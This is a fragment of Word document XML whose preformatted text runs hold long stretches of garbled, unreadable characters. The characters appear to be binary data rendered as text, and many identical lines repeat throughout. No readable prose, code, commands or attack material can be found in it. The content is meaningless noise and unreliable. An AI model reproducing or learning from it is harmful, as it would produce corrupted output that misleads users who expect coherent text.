      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!? ? ? ? ?Xèmf????M[Jv?5Xj?#d?Y???M[Jv?5Xj?#d?Y???MKJ#Z#Z#Z#Z#Z??0??MI?&amp;3?b?k??Y,`f?5Xj?d?Ylv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6?#?,?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??0Y?!?2#ZG?#qsssnfff?o?m??n?l?#4:??M#?#?f?a?#?*???aS%?#?j??Y#J?"j???#|#F5Xj?,#?J#5Xj?T</w:t>
        <w:tab/>
        <w:t>&gt;Ш?#;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??#I#?##v???n~~?---ML#8p??[?n?gR&gt;5#AL?4:???x?V?????1??G??????V????11??E??????V????11??E???????J?Sk#</w:t>
        <w:tab/>
        <w:t>#?</w:t>
        <w:tab/>
        <w:t>?#;v????C?#???&gt;?#???E??WlH7???it*i??1?)?4K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>{c?##?#O</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??q?%?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?c?##?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??q?%?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?c?##?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??qI???c??##,?#ZMJ?#?W???#J7??J??T?6cc#Szi?#???;6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6c?#Kz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6??;6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6c?#Kz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6??;6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6c?L/9??##,?#Z]b?#0#?d##R#?N%msH\c?#?R??XX#?C????!??!?#K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?c`=$#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#6??6?&lt;#,5l????#4Xj?##?T#?9??F?????g?? ?nw##0?DC+?F##?4???(?5?P?#??h#??u?#?J??{??XK?#??:]?l%?l?=?D?Cmh#??#ah??|S!?v??=9??o????????,?#\?#?#?#?#?#?#?#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??i^#{?#-#?Xr??#??j?#:??#@???4P????</w:t>
        <w:tab/>
        <w:t>?]:?#?O?#?.#?O??C???##? A8?#??#/????#?!Q?c?!?I???*6?#?0???0NV?P?V????~?8Y?B?X?#?+YG!BKZ#?G?2+?#r?H?!#?d#?#y?</w:t>
        <w:tab/>
        <w:t>?~?n#?#?O?#?.#?#?'o#y?#?'???^??##??#Z#Ж-[Z???~-.#tT.A???#]?\?#.A???#]?\?#.A???#]?\?#.A???u?Z#H#?Nh?????y???4?Q?#Z?j[?B`c5#?N</w:t>
        <w:br/>
        <w:t>??#P??&lt;???~????C??????&amp;*k#?#?Sút#??##L?#Z#?_#???q?oqqQ"?56???z#?0*C#?#?Q?</w:t>
        <w:br/>
        <w:t>?G???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-+?#-?2vQ?2#???~???????#A?D?BK"0?#################+##ZV??##@##@##@##@##@`?# ?F[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@##@##@##@??#??#y?################-##??V-################?"#?eE#~A##@##@##@##@##FK#Bk?U??@##@##@##@##@##?#@hY??_##############??#??#m?"0###############+##ZV??##@##@##@##@##@`?# ?F[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@##@##@##@??#??#???#8p??v?i???#?rz?????Q????</w:t>
        <w:tab/>
        <w:t>?]:?#?O?#?.#?O~?#??_???h?-nff?m??,(?Z#???[#?#??7??K?????@?C??~ ??#?#?!O~??C???A#{qq18=##'??#?.EN?O</w:t>
        <w:br/>
        <w:t>??}?~??K?#????p#????R?D???#?#B+??s?_ChE+?o???Q?l?##?C?(?#0??#??h#??#W?4?G#??</w:t>
        <w:tab/>
        <w:t>?"\#?##?</w:t>
        <w:br/>
        <w:t>&amp; ?#???#??s??#777?J??m?[XX???#k?l??????5Tv?????#BU?9?#0?.)-?y?4??{?}?cc?#?g?uU#??:?5#?i?Z?S-?/O?#r#??o????c?={#?#?']??</w:t>
        <w:br/>
        <w:t>h?m}h??'????#?????.J???.?##&gt;?fggW?#Z?]?n]????D?#Y?]???7??QdQ?c#Z9?o8!uIiQ???CD??#?FP????(e?T??1#???~?7F????6I???v|?B?MT?'6???????y`??M??Ma?n#BK#??;h#O4?k???????#O??m??6#hmB+??????V?56??T??'?.)-????vN}&amp;???#?O??~?c"??~?#??#?7on??~??O??B?????#?????D?x?##-#???M#??3??u?P=???m#Z1v?Fx?%??#?~?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>74&gt;k???$#c??6e?x????K?????????6????~?+]#???#M??#??z_?Q#????</w:t>
        <w:br/>
        <w:t>-?m??#2???i#?^##?D???/V,U'?My?D?#?^#????wV(x?#r#??vp?M7u??%B?r??~?#?#Z???bL;?a???a}?/?O?D$u?4M#Q?v?S#??#???[??B???#?+#7n?}?)?7?/Yf#?D??#6?#i?'?t?59??%??$???VS???#Τ#???#?9????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>!?#?M????79A???#b]??&amp;?U?k??4??v#F?3[?#????m????w???]?\?Z?????@h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F#??O??#??"?.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??&amp;?R?#Gh?~?????X???F?u??IW????&gt;?Eu??IS?M}3Dh?~??O??????#?Q???S=?^#??6?5??#&gt;#?K</w:t>
        <w:tab/>
        <w:t>???}[???Z?;???q?#</w:t>
        <w:tab/>
        <w:t>H?H]?#B#???z????y??????#?b??:?(????#????B4?#?'?~??}u??M|??h#=?SaG???T?#I%?#?Y??U#-Y?k????|?D??????h??#2??Lp?1#6oQ???#?gm??w?#?#-?#?~???#1???????V??o#?t???#??#?B????]B??i???#??#!?#??-??#?g?{?????/????2?C2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??_?b?????M[?O??B????@??T?'?????O??^???,?#???c#?O??#r?????I_?]7??B???O?#?{?4?O??0#??#|/V?????#??~ _???P?m8?v#?u?T9??eH#E?#Z??????$???0???qhh?#Y5i*-??|??s#Z7d#??_?]+)}c#?G?~?V?C#d???=??=??B?????Kn?]?r?????;??4#?#?#B????P?1e##B?4#?a3t#</w:t>
        <w:br/>
        <w:t>Y??????x2???u???##?&amp;c]??hE?С??o?m?8??m~?#7#?×B#d#??#r??-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??p?TO?i{#U}?P_??|M???#,m7#?X#?\?'?.??#?3??#\N?#?FP?3+?S?om???#?c?!iH???`Ekmk?~??w????3?R?o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1??A?}6??!?r??????Y????A??M ????~?&amp;?w??P?y#?-#??-?b?c ??P????</w:t>
        <w:tab/>
        <w:t>?]:?#?O?#?.#?#?'o#???в?#? ## ## ## ## ###$#?5?JEH ## ## ## ## ##?# ?l??;#?##?##?##?##??#</w:t>
        <w:tab/>
        <w:t>@h??R###?##?##?##?##??-##-[??## ## ## ## ## 0B##Z#?T?## ## ## ## ## `K#B????##?##?##?##?##??#??#+#!?##?##?##?##?##?#?в?#? ## ## ## ## ###$#?5?JEH ## ## ## ## ##?# ?l??;#?##?##?##?##??#</w:t>
        <w:tab/>
        <w:t>@h??R###?##?##?##?##??-##-[??## ## ## ## ## 0B##Z#?T?## ## ## ## ## `K#B????##?##?##?##?##??#??#+#!?##?##?##?##?##?#?в?#? ## ## ## ## ###$#?5?JEH ## ## ## ## ##?# ?l??;#?##?##?##?##??#</w:t>
        <w:tab/>
        <w:t>@h??R###?##?##?##?##??-##-[??## ## ## ## ## 0B##Z#?T?## ## ## ## ## `K#B????##?##?##?##?##??#??#+#!?##?##?##?##?##?#?в?#? ## ## ## ## ###$#?5?J]XXp333n?=??m??m??#=zt??#G????????m?#l?????+_?JPz??){??D???{??^?????#?H#?c#?/Q?_x??СC??ZcKb,)????Zi0#M?#?????????????|?XKm~vv?-..??????T?#S#0?4W???#?MtW-2#?V???_?###?u????!#6M??#??=s????????C?2?/F??S?i?{?'&amp;yPZ?~??V#T?O~?Y??+???1=?[P??&amp;??p??Q?}???&gt;0??sǒ????5vb?m#?&gt;????r)???#??&amp;aD?w?y????9???K&lt;y#^D??_?e?S_??#/C?`?i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</w:t>
        <w:tab/>
        <w:t>0??Q#??#Z#?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?]?Vm?j</w:t>
        <w:br/>
        <w:t>?*~?#???B?x???7#?Y???3?XYe?A??N?Zu??h??_?*???z???</w:t>
        <w:tab/>
        <w:t>C?I??KZ?x?1???#?C&amp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_{?:?~?vQ??ZS:?s?????%7?pC???#K??9??:[?z??|g?"??G?~#!?~??????Em?????[?#}T~??7P????#A??|}???u[C???#=1?n;}?&gt;??u?</w:t>
        <w:tab/>
        <w:t>?y????i?#?5?7e???t?n?w?y??#??#}?D-f?P???7??U#?d?&amp;{?????_#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-#o??h??2?W=]???.gЩ??J\Co?7#*[????oh#j?mb*Dh??????~?#2??Ig?h??-??b?h?V.????W#d##??#uoj?#???##?M??k???|#?????)?6?#"???`?#?0??????&gt;?????J?[?[?$?&gt;?????F1?##2???K???????????????o?3'}e???&lt;f@m??#???2D?V??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>tCV4E#???/??w??s??(}?+?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?mA??s?"?b??mj#M+l##=+?u??G?#?</w:t>
        <w:tab/>
        <w:t>n??R?5?&gt;j???m?X#?MB???#B?{1?n#?u?#2i?x??(?S???y?m???jZ?%]?!?????o????#?#Z??Y?/??S???#2#?M???K?W4?#???o??x???;yv???z??j#???#Z?X?#§&gt;I???#N]h#????mk~a???)w?M#?A?D?#?#?G?S^\??5?z##?????~[?fZ????n?=$??&gt;#?7b?j?%n??._</w:t>
        <w:tab/>
        <w:t>???^????4?6m?&lt;?\??5m????&gt;7Y?{#m#??\Z%?#?C?%?#Fb???#?7?-:t??</w:t>
        <w:br/>
        <w:t>?????6?p?#,a&lt;i+#?V?B?^????##0g?yf???g:?n{?]?T_u??P}?!}?g?[??V?D??*f#u???&lt;,???N???v?n?#R=X$?f?????y??Eh????6?i[qn#,4?z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>衇</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;+K~k?P#O?Y?????S??#W??#????k7@??4#}??%???#??#??6?VZ?jV}+m???&gt;A'#?g?????[??g?g?[?C???k##o?#L?x3d%vh??)#??H?V???##??#aе-?O$?5n?????#?c?~?:I?????U#?7???'?m?4v?C?7?|?#Q#o????l?up#?9??z?S???#?Np??.Tc?#?0?X??S~????{?????m?D##?V???Y??@?:?b?.?K???#Tm?1F??=?#26}??#:M??&gt;?r&lt;??j?1???????????#-t{?#????????G????b?9?R?</w:t>
        <w:tab/>
        <w:t>?y??k?V</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ぶ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>_#?##???????ou????=#??}?</w:t>
        <w:br/>
        <w:t>?#?#??N???4??#v#y?;tBBe?xg?Лc?fL?P?nl!#??#????B????=#I??Mh??;vE?Χ.??sm?u?#??S2?#M?~?JY?????????&gt;?????O?[??=??G???P{]?-7?S?##?u??tjgh????*?f#????a1'???????#?????Ah#.???q#t???M#??#???^?E???O?(??????U??_??;I?#????z?}??u???4Th???T'?7v?? w?;??????#??#~#??V??#?_{?v?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??z?JU$??:O????????ǘ'?&gt;?#??</w:t>
        <w:tab/>
        <w:t>-?#??kj#u?#?K?#????????_f#?^?}??VO??T??#Y??UY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?O????b?Y#z???`?ǜ?#?t?;?V?B?*L?#xu#Q??t???????#?6Q???'lM??~??#B?#???{???ЛZ?????_?C?Z?</w:t>
        <w:br/>
        <w:t>?#??W??z??#??5ThQ?????ЪO?H?{?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?.??D\H???G??h7</w:t>
        <w:tab/>
        <w:t>??#&gt;B#P??</w:t>
        <w:br/>
        <w:t xml:space="preserve">?D???#Z?????o?~?g}#G?}?Φ??#??F?6??X????y????#?#?/??????g#?0?@h#,??#?z#????;??l?#;???'-????L~ </w:t>
        <w:br/>
        <w:t>9??5t5K?=Z?g??bn#?]+f??V?\s $??#??V?????x?Th?C'???##R?!???????$?&gt;Z_?k#Z]?3??7??s?S??Yoá?dc?7uZ*_??$t??????X?5Yl?^?v?M?G??\?#?????9#????#B+??1??%#?^GO#?OH?/k???n?m?F?m?h?A?r??</w:t>
        <w:tab/>
        <w:t>??}?????hbC7????D??#??z???K?\#?M)?Ъn??K?????e??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???g7???w?-A#:?H?</w:t>
        <w:tab/>
        <w:t>/z?o?*?i???r?K?#???#?????s???m7??+ZC?h?M?6?/~???4?u??</w:t>
        <w:br/>
        <w:t>??W??&amp;?Z}?t???Y?`?#???C?c#???#???2dN0??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>V?J#5#?/UhU#z?;???F?y???_#?{??????_??}?6~BB?W????s?%??</w:t>
        <w:br/>
        <w:t>??O??-?&lt;[?Y??D?~A?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#Zm?h?O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w#?=?#?.?$??##???S]???#???#??s??&amp;??Zg?#?m???U?K???!1?#V}?&gt;?</w:t>
        <w:tab/>
        <w:t>Y??BN*k??u</w:t>
        <w:tab/>
        <w:t>?#?c?#?-?f?#????W^??#?</w:t>
        <w:br/>
        <w:t>-?o?'#o???x#6?I?7xF+ft#Y??V?H</w:t>
        <w:tab/>
        <w:t>?#?w?h?'?5)#?#S#?T????m??7??</w:t>
        <w:tab/>
        <w:t>???&lt;b???-??mH!???h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#Z???0?N[??????~T? ??|[#?,i???</w:t>
        <w:br/>
        <w:t>-x@_???G??*t5?b????$L?#??#7?l?????#??y5?#i{?JShI?:??F????</w:t>
        <w:tab/>
        <w:t>?q????vg?##??g??Y?&amp;???WJhu#C?&amp;?B|W?\?,?W?h"?.u?????M???????#?#Y?</w:t>
        <w:br/>
        <w:t>Q?q?C?)P#BA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?o#??2]IB?oI?n???x??~????Ixh?K</w:t>
        <w:tab/>
        <w:t>???h?m]?K#u1o#Z}??,c</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>飖</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??]??N}???v#г????3?M?K??)???/??ha??Y???bN0??ow??#B#Bk?^W=??z#??&lt;?S##?U??_&gt;?V???9???CDf???!??????o??#Z????r?H_???|?l??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>箕</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?P?}#??#????Ry?#??w?Uc?8????q~#h;hdL}???h}_?z?u?i&lt;?6R??6??#Z????Z??{#7;;;yT?iGE???x??e??#L?x?#????BhY????g??&amp;?M?#4???M??#??k_y????x?3[?F?_????@??*??2#"?b?#Z?U???[?jG,#????#?#??)/</w:t>
        <w:tab/>
        <w:t>?R-o??VuU7d?FS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&amp;?}B+e#????U]y?{???o~?#1B?#???????w?}4e#???m??W?m??*?B???6??????и0??zh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??k?h?7C?mh??9#?Vε#Q??</w:t>
        <w:tab/>
        <w:t>???m?C6?#r?a?#??$?I?y#?????#?#???????W??</w:t>
        <w:tab/>
        <w:t>#??h#y?{????a#?5I}?}7??$?O?#I???RpbE?a#?&amp;&gt;}#C*]??ж#R?#?h??B#????~??? ?#????]??#??#?N?#?2#?oC?b?</w:t>
        <w:tab/>
        <w:t>??f??i##!???#R?##?##?##?@##?y?E#?#?#??8#?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 ## ## ##M#BN?#9#?@??\?,U##-)??## ## ## ## ## ##?!#???## ## ## ## ## ##?# ????##?##?##?##?##?##@h?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?##?##?##?##?##??0##-a?0## ## ## ## ## ###Zh# ## ## ## ## ##  L#BK#(?##?##?##?##?##?#?#?##?##?##?##?##?####??##</w:t>
        <w:br/>
        <w:t>s ## ## ## ## ## #??6## ## ## ## ## ##?# ????##?##?##?##?##?##@h?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?##?##?##?##?##??0##-a?0## ## ## ## ## ###Zh# ## ## ## ## ##  L#BK#(?##?##?##?##?##?#?#?##?##?##?##?##?####??##</w:t>
        <w:br/>
        <w:t>s ## ## ## ## ## #??6## ## ## ## ## ##?# ????##?##?##?##?##?##@h?</w:t>
      </w:r>
